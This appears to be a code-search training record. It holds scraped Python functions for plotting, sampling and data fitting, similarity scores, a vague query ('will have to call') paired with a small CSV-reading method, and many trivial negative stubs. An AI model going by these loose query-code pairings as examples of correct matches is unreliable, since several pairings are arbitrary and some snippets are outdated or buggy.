lows[1],\n \"yhigh\": highs[1],\n },\n }\n )\n\n # default to not showing data points\n if \"plot_datapoints\" not in kwargs:\n kwargs[\"plot_datapoints\"] = False\n\n if \"triangle\" in self.plottype:\n from pesummary.core.plots.bounded_1d_kde import bounded_1d_kde\n\n # set KDE informaiton\n kwargs.update(\n {\n \"kde_2d\": Bounded_2d_kde,\n \"kde_2d_kwargs\": {\n \"xlow\": lows[0],\n \"xhigh\": highs[0],\n \"ylow\": lows[1],\n \"yhigh\": highs[1],\n },\n \"kde\": bounded_1d_kde,\n }\n )\n\n kwargs[\"kde_kwargs\"] = {\n \"x_axis\": {\"xlow\": lows[0], \"xhigh\": highs[0], \"method\": methods[0]},\n \"y_axis\": {\"xlow\": lows[1], \"xhigh\": highs[1], \"method\": methods[1]},\n }\n\n args = [\n [samps[self.parameters[0]].values for samps in self._samples.values()],\n [samps[self.parameters[1]].values for samps in self._samples.values()],\n ]\n\n if \"xlabel\" not in kwargs:\n kwargs[\"xlabel\"] = self.latex_labels[self.parameters[0]]\n if \"ylabel\" not in kwargs:\n kwargs[\"ylabel\"] = self.latex_labels[self.parameters[1]]\n\n if \"labels\" not in kwargs and len(self.results) > 1:\n kwargs[\"labels\"] = list(self._samples.keys())\n\n # set injection parameter values\n if self.injection_parameters is not None:\n if (\n self.injection_parameters[self.parameters[0]] is not None\n and self.injection_parameters[self.parameters[1]] is not None\n ):\n kwargname = \"truths\" if self.plottype == \"corner\" else \"truth\"\n kwargs[kwargname] = [\n self.injection_parameters[self.parameters[0]]\n - self.parameter_offsets[self.parameters[0]],\n self.injection_parameters[self.parameters[1]]\n - self.parameter_offsets[self.parameters[1]],\n ]\n\n # create plot\n with DisableLogger():\n fig = plotfunc(*args, **kwargs)\n\n return fig",
"def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z",
"def gen_data(n_samples=200):\r\n\tnp.random.seed(13)\r\n\tx = np.random.uniform(0,10,size=n_samples) #从一个均匀分布[0,10)中随机采样\r\n\tx.sort()\r\n\ty = ground_truth(x) + 0.75*np.random.normal(size=n_samples) #均值为0,标准差为1的正态分布\r\n\t#print(\"x, y: \", x[:10], y[:10])\r\n\ttrain_mask = np.random.randint(0,2,size=n_samples).astype(np.bool) #返回值为True or False\r\n\t#print(\"train_mask: \",train_mask[:10])\r\n\tx_train, y_train = x[train_mask, np.newaxis], y[train_mask] #如果train_mask是1,就将x,y作为训练集,np.newaxis表示将行向量转为列向量\r\n\t#print(\"x_train, y_train: \", x_train[:10], y_train[:10])\r\n\tx_test, y_test = x[~train_mask, np.newaxis], y[~train_mask] #train_mask为False,将x,y作为测试集\r\n\t#print(\"x_test, y_test: \", x_test[:10], y_test[:10])\r\n\treturn x_train, x_test, y_train, y_test",
"def plot_f(self, samples=0, plot_limits=None, which_data='all', which_functions='all', resolution=None, full_cov=False):\n if which_functions=='all':\n which_functions = [True]*self.kern.Nparts\n if which_data=='all':\n which_data = slice(None)\n\n if self.X.shape[1] == 1:\n Xnew, xmin, xmax = x_frame1D(self.X, plot_limits=plot_limits)\n if samples == 0:\n m,v = self._raw_predict(Xnew, slices=which_functions)\n gpplot(Xnew,m,m-2*np.sqrt(v),m+2*np.sqrt(v))\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n else:\n m,v = self._raw_predict(Xnew, slices=which_functions,full_cov=True)\n Ysim = np.random.multivariate_normal(m.flatten(),v,samples)\n gpplot(Xnew,m,m-2*np.sqrt(np.diag(v)[:,None]),m+2*np.sqrt(np.diag(v))[:,None])\n for i in range(samples):\n pb.plot(Xnew,Ysim[i,:],Tango.colorsHex['darkBlue'],linewidth=0.25)\n pb.plot(self.X[which_data],self.likelihood.Y[which_data],'kx',mew=1.5)\n pb.xlim(xmin,xmax)\n ymin,ymax = min(np.append(self.likelihood.Y,m-2*np.sqrt(np.diag(v)[:,None]))), max(np.append(self.likelihood.Y,m+2*np.sqrt(np.diag(v)[:,None])))\n ymin, ymax = ymin - 0.1*(ymax - ymin), ymax + 0.1*(ymax - ymin)\n pb.ylim(ymin,ymax)\n if hasattr(self,'Z'):\n pb.plot(self.Z,self.Z*0+pb.ylim()[0],'r|',mew=1.5,markersize=12)\n\n elif self.X.shape[1] == 2:\n resolution = resolution or 50\n Xnew, xmin, xmax, xx, yy = x_frame2D(self.X, plot_limits,resolution)\n m,v = self._raw_predict(Xnew, slices=which_functions)\n m = m.reshape(resolution,resolution).T\n pb.contour(xx,yy,m,vmin=m.min(),vmax=m.max(),cmap=pb.cm.jet)\n pb.scatter(Xorig[:,0],Xorig[:,1],40,Yorig,linewidth=0,cmap=pb.cm.jet,vmin=m.min(), vmax=m.max())\n pb.xlim(xmin[0],xmax[0])\n pb.ylim(xmin[1],xmax[1])\n else:\n raise NotImplementedError, \"Cannot define a frame with more than two input dimensions\"",
"def gradient(f, *varargs):\n N = len(f.shape) # number of dimensions\n n = len(varargs)\n if n == 0:\n dx = [1.0]*N\n elif n == 1:\n dx = [varargs[0]]*N\n elif n == N:\n dx = list(varargs)\n else:\n raise SyntaxError, \"invalid number of arguments\"\n\n # use central differences on interior and first differences on endpoints\n\n outvals = []\n\n # create slice objects --- initially all are [:, :, ..., :]\n slice1 = [slice(None)]*N\n slice2 = [slice(None)]*N\n slice3 = [slice(None)]*N\n\n otype = f.dtype.char\n if otype not in ['f', 'd', 'F', 'D']:\n otype = 'd'\n\n for axis in range(N):\n # select out appropriate parts for this dimension\n out = zeros(f.shape, f.dtype.char)\n slice1[axis] = slice(1, -1)\n slice2[axis] = slice(2, None)\n slice3[axis] = slice(None, -2)\n # 1D equivalent -- out[1:-1] = (f[2:] - f[:-2])/2.0\n out[slice1] = (f[slice2] - f[slice3])/2.0\n slice1[axis] = 0\n slice2[axis] = 1\n slice3[axis] = 0\n # 1D equivalent -- out[0] = (f[1] - f[0])\n out[slice1] = (f[slice2] - f[slice3])\n slice1[axis] = -1\n slice2[axis] = -1\n slice3[axis] = -2\n # 1D equivalent -- out[-1] = (f[-1] - f[-2])\n out[slice1] = (f[slice2] - f[slice3])\n\n # divide by step size\n outvals.append(out / dx[axis])\n\n # reset the slice object in this dimension to \":\"\n slice1[axis] = slice(None)\n slice2[axis] = slice(None)\n slice3[axis] = slice(None)\n\n if N == 1:\n return outvals[0]\n else:\n return outvals",
"def _get_distribution(self, dimension, samples, **kwargs):\n\n # Save settings for distribution\n sample = samples[dimension]\n if 'name' in kwargs:\n name = kwargs.get('name')\n else:\n err_msg = \"_get_distribution misses the argument 'name'.\"\n raise TypeError(err_msg)\n dependency = kwargs.get('dependency', (None, None, None))\n functions = kwargs.get('functions', ('polynomial', 'polynomial', 'polynomial'))\n list_number_of_intervals = kwargs.get('list_number_of_intervals')\n list_width_of_intervals = kwargs.get('list_width_of_intervals')\n\n # Fit inspection data for current dimension\n fit_inspection_data = FitInspectionData()\n\n # Initialize used_number_of_intervals (shape, loc, scale\n used_number_of_intervals = [None, None, None]\n\n # Handle KernelDensity separated\n if name == 'KernelDensity':\n if dependency != (None, None, None):\n raise NotImplementedError(\"KernelDensity can not be conditional.\")\n return KernelDensityDistribution(Fit._fit_distribution(sample, name)), dependency, \\\n used_number_of_intervals, fit_inspection_data\n\n # Initialize params (shape, loc, scale)\n params = [None, None, None]\n\n for index in range(len(dependency)):\n\n # Continue if params is yet computed\n if params[index] is not None:\n continue\n\n # In case that there is no dependency for this param\n if dependency[index] is None:\n current_params = Fit._fit_distribution(sample, name)\n\n # Basic fit for no dependency\n basic_fit = BasicFit(*current_params, sample)\n for i in range(index, len(functions)):\n # Check if the other parameters have also no dependency\n if dependency[i] is None:\n\n # Add basic fit to fit inspection data\n if i == 0:\n fit_inspection_data.append_basic_fit(SHAPE_STRING,\n basic_fit)\n elif i == 1:\n fit_inspection_data.append_basic_fit(LOCATION_STRING,\n basic_fit)\n elif i == 2:\n fit_inspection_data.append_basic_fit(SCALE_STRING,\n basic_fit)\n\n if i == 2 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n params[i] = ConstantParam(np.log(current_params[i](0)))\n else:\n params[i] = current_params[i]\n # In case that there is a dependency\n else:\n # If the number of intervals is given.\n if list_number_of_intervals[dependency[index]]:\n interval_centers, dist_values, param_values, multiple_basic_fit = \\\n Fit._get_fitting_values(\n sample, samples, name, dependency, index,\n number_of_intervals=list_number_of_intervals[dependency[index]])\n # If a the (constant) width of the intervals is given.\n elif list_width_of_intervals[dependency[index]]:\n interval_centers, dist_values, param_values, multiple_basic_fit = \\\n Fit._get_fitting_values(\n sample, samples, name, dependency, index,\n bin_width=list_width_of_intervals[dependency[index]])\n\n for i in range(index, len(functions)):\n # Check if the other parameters have the same dependency\n if dependency[i] is not None and dependency[i] == dependency[index]:\n # Add basic fits to fit inspection data\n for basic_fit in multiple_basic_fit:\n if i == 0:\n fit_inspection_data.append_basic_fit(\n SHAPE_STRING,\n basic_fit)\n elif i == 1:\n fit_inspection_data.append_basic_fit(\n LOCATION_STRING,\n basic_fit)\n elif i == 2:\n fit_inspection_data.append_basic_fit(\n SCALE_STRING,\n basic_fit)\n\n # Add interval centers to fit inspection data\n if i == 0:\n fit_inspection_data.shape_at = interval_centers\n elif i == 1:\n fit_inspection_data.loc_at = interval_centers\n elif i == 2:\n fit_inspection_data.scale_at = interval_centers\n\n # Add used number of intervals for current parameter\n used_number_of_intervals[i] = 
len(interval_centers)\n\n if i == 2 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n fit_points = [np.log(p(None)) for p in param_values[i]]\n else:\n fit_points = [p(None) for p in param_values[i]]\n # Fit parameters with particular function\n try:\n param_popt, param_pcov = curve_fit(\n Fit._get_function(functions[i]),\n interval_centers, fit_points, bounds=_bounds)\n except RuntimeError:\n # Case that optimal parameters not found\n if i == 0 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n param_name = \"sigma\"\n elif i == 2 and name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n param_name = \"mu\"\n elif i == 0:\n param_name = SHAPE_STRING\n elif i == 1:\n param_name = LOCATION_STRING\n elif i == 2:\n param_name = SCALE_STRING\n\n warnings.warn(\n \"Optimal Parameters not found for parameter '{}' in dimension \"\n \"'{}'. Maybe switch the given function for a better fit. Trying \"\n \"again with a higher number of calls to function '{}'.\".format(\n param_name, dimension, functions[i]),\n RuntimeWarning, stacklevel=2)\n try:\n param_popt, param_pcov = curve_fit(\n Fit._get_function(functions[i]), interval_centers, fit_points,\n bounds=_bounds, maxfev=int(1e6))\n except RuntimeError:\n raise RuntimeError(\n \"Can't fit curve for parameter '{}' in dimension '{}'. \"\n \"Number of iterations exceeded.\".format(param_name, dimension))\n\n # Save parameter\n params[i] = FunctionParam(*param_popt, functions[i])\n\n # Return particular distribution\n distribution = None\n if name == WEIBULL_2P_KEYWORD or name == WEIBULL_3P_KEYWORD or \\\n name == WEIBULL_3P_KEYWORD_ALTERNATIVE:\n distribution = WeibullDistribution(*params)\n elif name == LOGNORMAL_MU_PARAMETER_KEYWORD:\n distribution = LognormalDistribution(sigma=params[0], mu=params[2])\n elif name == LOGNORMAL_EXPMU_PARAMETER_KEYWORD:\n distribution = LognormalDistribution(*params)\n elif name == NORMAL_KEYWORD:\n distribution = NormalDistribution(*params)\n return distribution, dependency, used_number_of_intervals, fit_inspection_data",
"def corr_vars( start=1, stop=10, step=1, mu=0, sigma=3, func=lambda x: x ):\n \n # Generate x\n x = np.arange(start, stop, step) \n \n # Generate random noise\n e = np.random.normal(mu, sigma, x.size)\n \n # Generate y values as y = func(x) + e\n y = np.zeros(x.size)\n \n for ind in range(x.size):\n y[ind] = func(x[ind]) + e[ind]\n \n return (x,y)",
"def generate_data(n, data, labels, param, label):\n\n\tmu = param[0]\n\tsigma = param[1]\n\n\tfor i in range(n):\n\n\t\t# TODO: Recall the notation of x in the exercise sheet.\n\t\t# \t\tGenerate a 2-d Gaussian distributed data point plus an offset value for the bias.\n\t\t# \t\tUse our rand_gaussian method.\n\n\t\tx1 = rand_gaussian(mu[0], sigma[0]) \n\t\tx2 = rand_gaussian(mu[1], sigma[1]) \n\n\t\tdata_point = [1, x1, x2]\n\t\tdata.append(data_point)\n\t\tlabels.append(label)\n\n\treturn data,labels",
"def sampling(args):\r\n z_mean, z_log_var = args\r\n # K is the keras backend\r\n batch = K.shape(z_mean)[0]\r\n dim = K.int_shape(z_mean)[1]\r\n # by default, random_normal has mean=0 and std=1.0\r\n epsilon = K.random_normal(shape=(batch, dim))\r\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\r\n z_mean, z_log_var = args\r\n # K is the keras backend\r\n batch = K.shape(z_mean)[0]\r\n dim = K.int_shape(z_mean)[1]\r\n # by default, random_normal has mean=0 and std=1.0\r\n epsilon = K.random_normal(shape=(batch, dim))\r\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampleFunction2(x2: int, y2: float) -> float:\n return x2 * y2",
"def make_data(n_features, n_pts, noise=0.0):\n X = stats.uniform(-1, 2).rvs((n_pts, n_features))\n\n # include a feature of 1's, for first-order terms in quadratic\n ones = np.ones((n_pts, 1))\n X_plus_ones = np.concatenate([ones, X], axis=1)\n\n # random coefficient matrix\n coeffs = stats.uniform(-1, 2).rvs((n_features+1, n_features+1))\n\n y = (X_plus_ones.reshape(n_pts, n_features+1, 1) *\n coeffs *\n X_plus_ones.reshape(n_pts, 1, n_features+1)).sum(axis=(1, 2))\n y += stats.norm(0, noise).rvs(n_pts)\n return X, y",
"def brute(f, ranges, args=(), Ns=3, full_output=False):\n # Generate the parameter space\n lrange = list(ranges)\n N = len(ranges)\n for k in range(N):\n low, high = lrange[k]\n lrange[k] = np.linspace(low, high, Ns)\n xs = np.array(np.meshgrid(*lrange)).T.reshape(-1, N)\n return find_fmin_on_grid(f, xs, args, full_output)",
"def statfunc(f):\n\n def wrapped_f(pymc3_obj, *args, **kwargs):\n try:\n vars = kwargs.pop('vars', pymc3_obj.varnames)\n chains = kwargs.pop('chains', pymc3_obj.chains)\n except AttributeError:\n # If fails, assume that raw data was passed.\n return f(pymc3_obj, *args, **kwargs)\n\n burn = kwargs.pop('burn', 0)\n thin = kwargs.pop('thin', 1)\n combine = kwargs.pop('combine', False)\n # Remove outer level chain keys if only one chain)\n squeeze = kwargs.pop('squeeze', True)\n\n results = {chain: {} for chain in chains}\n for var in vars:\n samples = pymc3_obj.get_values(var, chains=chains, burn=burn,\n thin=thin, combine=combine,\n squeeze=False)\n for chain, data in zip(chains, samples):\n results[chain][var] = f(np.squeeze(data), *args, **kwargs)\n\n if squeeze and (len(chains) == 1 or combine):\n results = results[chains[0]]\n return results\n\n wrapped_f.__doc__ = f.__doc__\n wrapped_f.__name__ = f.__name__\n\n return wrapped_f",
"def interval_multivariate(inputspikes, outputspikes, samples=1):\n times = []\n krdists = []\n for prv, nxt in zip(outputspikes[:-1], outputspikes[1:]):\n krd = multivariate(inputspikes, prv, nxt, samples)\n times.append(krd[0])\n krdists.append(krd[1])\n return times, krdists",
"def DataSample(*args, **kw):\n return cnexxT.DataSample.make_shared(cnexxT.DataSample(*args, **kw))",
"def plot3d(data, label, feature0, feature1, feature2):\n female = []\n male = []\n for i in range(0, 4000):\n if label[i] == 0:\n female.append([data[i, 0], data[i, 1], data[i, 2]])\n elif label[i] == 1:\n male.append([data[i, 0], data[i, 1], data[i, 2]])\n\n fig = plt.figure(figsize=(8, 8))\n ax = fig.add_subplot(111, projection='3d')\n plt.rcParams['legend.fontsize'] = 10\n ax.plot([row[feature0] for row in female], [row[feature1] for row in female], [row[feature2] for row in female],\n 'o', markersize=8, color='red',\n alpha=0.5, label='Female')\n ax.plot([row[feature0] for row in male], [row[feature1] for row in male], [row[feature2] for row in male], '+',\n markersize=8, alpha=0.5,\n color='blue', label='Male')\n plt.title('4000 Samples for Female and Male')\n ax.legend(loc='upper right')\n plt.show()",
"def _resample(x: np.ndarray, y: np.ndarray, n_samples: Optional[int]) -> Tuple[np.ndarray, np.ndarray]:\n if n_samples is None:\n n_samples = y.size\n new_x = np.linspace(x[0], x[1], n_samples)\n new_y = interp1d(x, y)(new_x)\n return new_x, new_y",
"def map(self, f_list: List[Callable[[np.ndarray], int]], axis: int = 0, chunksize: int = 1000, selection: np.ndarray = None) -> List[np.ndarray]:\n\t\tif hasattr(f_list, '__call__'):\n\t\t\traise ValueError(\"f_list must be a list of functions, not a function itself\")\n\n\t\tresult = []\n\t\tif axis == 0:\n\t\t\trows_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[0]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[0]:\n\t\t\t\trows_per_chunk = min(self.shape[0] - ix, rows_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :][:, selection]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[ix:ix + rows_per_chunk, :]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + rows_per_chunk] = np.apply_along_axis(f_list[i], 1, chunk)\n\t\t\t\tix = ix + rows_per_chunk\n\t\telif axis == 1:\n\t\t\tcols_per_chunk = chunksize\n\t\t\tfor i in range(len(f_list)):\n\t\t\t\tresult.append(np.zeros(self.shape[1]))\n\t\t\tix = 0\n\t\t\twhile ix < self.shape[1]:\n\t\t\t\tcols_per_chunk = min(self.shape[1] - ix, cols_per_chunk)\n\t\t\t\tif selection is not None:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk][selection, :]\n\t\t\t\telse:\n\t\t\t\t\tchunk = self[:, ix:ix + cols_per_chunk]\n\t\t\t\tfor i in range(len(f_list)):\n\t\t\t\t\tresult[i][ix:ix + cols_per_chunk] = np.apply_along_axis(f_list[i], 0, chunk)\n\t\t\t\tix = ix + cols_per_chunk\n\t\treturn result",
"def sampling(args):\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(-0.5 * z_log_var) * epsilon",
"def evaluate_random_function(f, x, y):\n\n # your code goes here",
"def _get_random_data(\n batch_shape: torch.Size, num_outputs: int, n: int = 10, **tkwargs\n) -> Tuple[Tensor, Tensor]:\n rep_shape = batch_shape + torch.Size([1, 1])\n train_x = torch.linspace(0, 0.95, n, **tkwargs).unsqueeze(-1)\n train_x = train_x + 0.05 * torch.rand(n, 1, **tkwargs).repeat(rep_shape)\n train_y = torch.sin(train_x * (2 * math.pi))\n train_y = train_y + 0.2 * torch.randn(n, num_outputs, **tkwargs).repeat(rep_shape)\n return train_x, train_y",
"def _segmented_apply_func(data, func, fs=1.0, n_segments=1, len_segment=None,\n frequency_resolution=None, overlap=0.5,\n func_params_dict=None):\n # Number of data points in time series\n length_signal = np.shape(data)[1]\n\n # It is assumed that data has shape (n_channels, n_samples). To fetch\n # samples set correct axis\n axis = -1\n\n func_params_dict.update(dict(fs=fs))\n\n # If fs and peak resolution is pq.Quantity, get magnitude\n if isinstance(fs, pq.quantity.Quantity):\n fs = fs.rescale('Hz').magnitude\n\n # Determine length per segment - n_per_seg\n if frequency_resolution is not None:\n if frequency_resolution <= 0:\n raise ValueError(\"frequency_resolution must be positive\")\n if isinstance(frequency_resolution, pq.quantity.Quantity):\n dF = frequency_resolution.rescale('Hz').magnitude\n else:\n dF = frequency_resolution\n n_per_seg = int(fs / dF)\n if n_per_seg > data.shape[axis]:\n raise ValueError(\"frequency_resolution is too high for the given \"\n \"data size\")\n elif len_segment is not None:\n if len_segment <= 0:\n raise ValueError(\"len_seg must be a positive number\")\n elif data.shape[axis] < len_segment:\n raise ValueError(\"len_seg must be shorter than the data length\")\n n_per_seg = len_segment\n else:\n if n_segments <= 0:\n raise ValueError(\"n_segments must be a positive number\")\n elif data.shape[axis] < n_segments:\n raise ValueError(\"n_segments must be smaller than the data length\")\n # when only *n_segments* is given, *n_per_seg* is determined by solving\n # the following equation:\n # n_segments * n_per_seg - (n_segments-1) * overlap * n_per_seg =\n # data.shape[-1]\n # -------------------- =============================== ^^^^^^^^^^^\n # summed segment lengths total overlap data length\n n_per_seg = int(data.shape[axis] /\n (n_segments - overlap * (n_segments - 1)))\n\n n_overlap = int(n_per_seg * overlap)\n n_overlap_step = n_per_seg - n_overlap\n n_segments = int((length_signal - n_overlap) / (n_per_seg - n_overlap))\n\n # Generate frequencies for spectral measure estimate\n if func_params_dict.get('return_onesided'):\n freqs = np.fft.rfftfreq(n_per_seg, d=1/fs)\n elif func_params_dict.get('return_onesided') is None:\n # multitaper_psd uses rfft (i.e. no return_onesided parameter)\n freqs = np.fft.rfftfreq(n_per_seg, d=1/fs)\n else:\n freqs = np.fft.fftfreq(n_per_seg, d=1/fs)\n\n # Zero-pad signal to fit segment length\n remainder = length_signal % n_overlap_step\n\n data = np.pad(data, [(0, 0), (0, remainder)],\n mode='constant', constant_values=0)\n\n # Generate array for storing cross spectra estimates of segments\n seg_estimates = np.zeros((n_segments,\n data.shape[0],\n data.shape[0],\n len(freqs)),\n dtype=np.complex64)\n\n n_overlap_step = n_per_seg - n_overlap\n\n for i in range(n_segments):\n\n _, estimate = func(\n data[:, i * n_overlap_step:i * n_overlap_step + n_per_seg],\n **func_params_dict)\n\n # Workaround for mismatched dimensions\n if estimate.ndim != seg_estimates.ndim - 1: # Multitaper PSD\n seg_estimates[i] = estimate[:, np.newaxis, :]\n else:\n seg_estimates[i] = estimate\n\n avg_estimate = np.mean(seg_estimates, axis=0)\n\n return freqs, avg_estimate",
"def interpolate_2d(x, y, z):\n X = np.linspace(min(x), max(x))\n Y = np.linspace(min(y), max(y))\n X, Y = np.meshgrid(X, Y)\n #f = interpolate.interp2d(x, y, z)\n #Z = f(X[0, :], Y[:, 0])\n f = interpolate.LinearNDInterpolator(zip(x, y), z)\n Z = f(X, Y)\n return X, Y, Z",
"def plot3d(data):\n assert span1 == span2\n span = span1\n # ---------------------- create the figure and axes ---------------------- #\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n\n # -- discretize the definition space and compute the function's images --- #\n X, Y = discretise_space([defspace1, defspace2], n=span)\n Z = data\n\n # ----------------------- appearance and plotting ------------------------ #\n ax.set_zlim(np.min(Z) - 0.5, np.max(Z) + 0.5)\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n ax.set(xlabel='$W\\_C$', ylabel='$W\\_W$', zlabel=\"Utilité\")#,\n # title='Utilité à {} ticks en fonction de W_W et W_C'.format(ticks))\n\n # Plot the surface.\n surf = ax.plot_surface(X, Y, Z, alpha=0.8, #, cmap='binary'\n linewidth=0, antialiased=False, zorder=1)\n\n plt.show()",
"def generateData(numPoints,x,y):\n\tfor i in range(0,numPoints):\n\t\tif (i % 2 == 0):\n\t\t\tx.append(random.normalvariate(25, 15))\n\t\t\ty.append(random.normalvariate(25, 15))\n\t\t\t \n\t\t\t\n\t\telse:\n\t\t\tx.append(random.normalvariate(75, 15))\n\t\t\ty.append(random.normalvariate(75, 15))",
"def f(x):\n n_particles = x.shape[0]\n j = [f_per_particle(x[i]) for i in range(n_particles)]\n #print(\"f j: \", j)\n return np.array(j)"
] | [
"0.7615295",
"0.70778996",
"0.6081689",
"0.57048494",
"0.56257445",
"0.55822027",
"0.55651504",
"0.55339074",
"0.54328907",
"0.53981596",
"0.5369118",
"0.53515136",
"0.53430045",
"0.5319749",
"0.5275369",
"0.5249938",
"0.52404726",
"0.52143115",
"0.52082497",
"0.51295596",
"0.5065049",
"0.5063601",
"0.5039212",
"0.50357884",
"0.5035016",
"0.5013174",
"0.5011391",
"0.5002498",
"0.49957132",
"0.49888596",
"0.49849415",
"0.4977262",
"0.49757117",
"0.4969503",
"0.4953392",
"0.4947583",
"0.49159727",
"0.491036",
"0.49087727",
"0.49006847",
"0.4889334",
"0.48722792",
"0.48484975",
"0.4842241",
"0.48356074",
"0.48356074",
"0.48356074",
"0.48356074",
"0.48356074",
"0.4832969",
"0.48321158",
"0.4827167",
"0.48143882",
"0.48071453",
"0.47991377",
"0.4797065",
"0.47940162",
"0.4784388",
"0.4783718",
"0.4782624",
"0.47810403",
"0.4780347",
"0.47762704",
"0.4772006",
"0.47717047",
"0.47671124",
"0.4765019",
"0.47625548",
"0.47598806",
"0.4759291",
"0.47570184",
"0.47545025",
"0.47502604",
"0.47494572",
"0.47439006",
"0.4740833",
"0.47402674",
"0.47292152",
"0.47273695",
"0.4724088",
"0.47223192",
"0.47174656",
"0.47174656",
"0.47074744",
"0.47022834",
"0.4701743",
"0.46911317",
"0.4689613",
"0.46889967",
"0.46847937",
"0.46694684",
"0.46650767",
"0.4664187",
"0.46641037",
"0.4662821",
"0.46627906",
"0.46622235",
"0.46621388",
"0.46587133",
"0.46584964"
] | 0.7539873 | 1 |
will have to call | def read_csv(self, filename):
with open(filename, 'r') as f:
read = f.read()
self.names = [x for x in read.split('\n') if x]  # keep only non-empty lines as names
return self.names | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __call__(self):\n\t\treturn",
"def use(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def run(self):",
"def __call__(self) -> None:",
"def process(self):",
"def process(self):",
"def process(self):",
"def call(self):",
"def __call__( self ):\n pass",
"def run(self): \r\n return",
"def __call__(self):\n pass",
"def __call__(self):\n pass",
"def support(self):",
"def post_execute(self):",
"def __call__():",
"def __call__():",
"def __call__():",
"def __call__():",
"def __call__():",
"def handle(self):",
"def init(self):",
"def init(self):",
"def _postprocess(self):",
"def regular(self):",
"def _hook(self):",
"def __call__(self):\n raise NotImplementedError",
"def run(self):\r\n pass",
"def initialize(self):",
"def initialize(self):",
"def initialize(self):",
"def initialize(self):",
"def __call__(self):",
"def __call__(self):",
"def execute(self):",
"def execute(self):",
"def execute(self):",
"def execute(self):",
"def RUN(self):",
"def processing(self):\n pass",
"def _prepare(self):",
"def _prepare(self):",
"def apply(self):",
"def main(self):",
"def run(self):\n\t\t\n\t\tpass",
"def apply(self) -> None:",
"def apply(self) -> None:",
"def pre_execute(self):",
"def __call__(object):",
"def degibber(self):",
"def pick_up(self):",
"def _init(self):",
"def result(self):",
"def result(self):",
"def prepare(self):",
"def perform(self):\n pass",
"def update(self):",
"def update(self):",
"def update(self):",
"def run(self):\n \n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def run(self):\n pass",
"def post_build(self):",
"def afterInit(self):",
"def think(self):\n pass",
"def post_init(self):\n\t\tpass",
"def object(self):",
"def __post_init__(self):\n pass",
"def CL(self):",
"def __call__(self):\r\n raise NotImplementedError('override me')",
"def on(self):",
"def process(self):\n pass",
"def application(self):",
"def method(self):",
"def script(self):",
"def target(self):",
"def cx():",
"def post_processor(self):",
"def __init__ (self) :",
"def DM(self):"
] | [
"0.752373",
"0.7373912",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7356112",
"0.7240168",
"0.719627",
"0.719627",
"0.719627",
"0.71953917",
"0.7184699",
"0.71057045",
"0.70959705",
"0.70959705",
"0.6973527",
"0.6949504",
"0.6867076",
"0.6867076",
"0.6867076",
"0.6867076",
"0.6867076",
"0.6854172",
"0.67677957",
"0.67677957",
"0.67495805",
"0.6738181",
"0.671467",
"0.6704254",
"0.669808",
"0.6693011",
"0.6693011",
"0.6693011",
"0.6693011",
"0.66917676",
"0.66917676",
"0.66773444",
"0.66773444",
"0.66773444",
"0.66773444",
"0.6663744",
"0.66616553",
"0.66404676",
"0.66404676",
"0.66386956",
"0.65971154",
"0.657434",
"0.6573848",
"0.6573848",
"0.65664244",
"0.65637076",
"0.6554807",
"0.65541834",
"0.651954",
"0.6515558",
"0.6515558",
"0.65098375",
"0.6508802",
"0.6491477",
"0.6491477",
"0.6491477",
"0.6489664",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.64863527",
"0.6471957",
"0.6449475",
"0.6448369",
"0.64375615",
"0.6426431",
"0.641711",
"0.64097166",
"0.64014983",
"0.6400586",
"0.63993907",
"0.63972145",
"0.63701844",
"0.6366413",
"0.6362485",
"0.63542074",
"0.6353878",
"0.6332886",
"0.63222855"
] | 0.0 | -1 |
takes names from RestaurantNames class | def __init__(self, names):
self.names = names
self.results = [] | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.restaurant_name = restaurant_name.title()\n\t\tself.cuisine_type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n\t\tself.name = restaurant_name\n\t\tself.type = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.food = cuisine_type",
"def __init__(self, restaurant_name, cuisine_type):\n self.name = restaurant_name\n self.type = cuisine_type",
